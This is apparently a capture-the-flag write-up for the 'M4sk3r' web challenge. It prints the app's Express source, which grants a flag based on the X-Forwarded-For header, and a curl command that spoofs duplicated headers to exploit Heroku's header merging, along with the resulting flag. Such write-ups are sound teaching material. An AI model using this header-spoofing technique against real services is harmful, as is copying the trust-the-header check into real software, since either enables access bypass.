M4sk3r
Category: Web
150 points
Can you Mask it? M4sk3r
Author: Hackerbone
Solution
Under the challenge url there’s a simple webpage with flag checker.
I couldn’t find anything, so I’ve given a chance to dirb
. After a while of running it found a hint ;-)
+ https://wtfmasker.herokuapp.com/source (CODE:200|SIZE:1644)
The source code of the app as below.
const express = require('express');
const app = express();
const port = process.env.PORT;
const path = require('path');
const fs = require('fs');
app.use(express.urlencoded({
extended: true
}))
var SOURCE = '';
fs.readFile(path.dirname(__filename+'/index.js'), 'utf-8', (err, data)=>{
if(err){
console.error(err);
return
}
SOURCE = data;
})
const first = process.env.FIRST
const second = process.env.SECOND
const FLAG = process.env.FLAG
const temp = 'wtfCTF{sc4mm3d_4g41n}'
app.get('/getFlag', (req, res) => {
if ('x-forwarded-for' in req.headers) {
// I believe in 0,2,-1
var InternetProtocols = req.headers['x-forwarded-for'].split(', ')
if (!InternetProtocols) {
return res.status(400).send("<h4>Visible confusion</h4>");
}
if ((InternetProtocols[first] !== InternetProtocols[second]) || (InternetProtocols[first] !== InternetProtocols[InternetProtocols.length - 1])) {
return res.status(400).send("<h4>The indices I wanted to check don't match, no flag for you :p</h4>");
}
var ip = InternetProtocols[first].toString();
if (ip != "6.9.6.9") {
return res.status(401).send("Nah, incorrect ip");
}
return res.send("Damn, nice one you get to enjoy this : <h4>" + FLAG + "</h4>");
}
res.send(temp)
})
app.get('/', (req, res) => {
res.sendFile(path.join(__dirname, './' ,'index.html'))
})
app.get('/source', (req, res) => {
res.send(SOURCE);
})
app.post('/checkFlag', (req,res)=>{
var inpFlag = req.body.flagInput;
if(inpFlag === FLAG){
return res.send("Flag Is Correct! GG");
}
res.send("Flag Is wrong");
})
app.listen(port)
/getFlag
endpoint seems to be the target for exploitation. It checks the X-Forwarded-To
header of the request.
After of couple of attempts I’ve managed to match all the conditions to get the flag.
curl https://wtfmasker.herokuapp.com/getFlag -H 'X-Forwarded-For: 6.9.6.9, <REDACTED MY IP ADDRESS>, 6.9.6.9' -H 'X-Forwarded-For: 6.9.6.9'
Damn, nice one you get to enjoy this : <h4>wtfCTF{just_4n0th3r_h34d3r}
The reason why it works is that Herokuapp takes first X-Forwarded-For
header, appends to it your IP address, and then
appends the second X-Forwarded-For
header. Header combined that way is finally passed to the application.
I’ve learned the above during one of the previous CTFs…
Flag
wtfCTF{just_4n0th3r_h34d3r}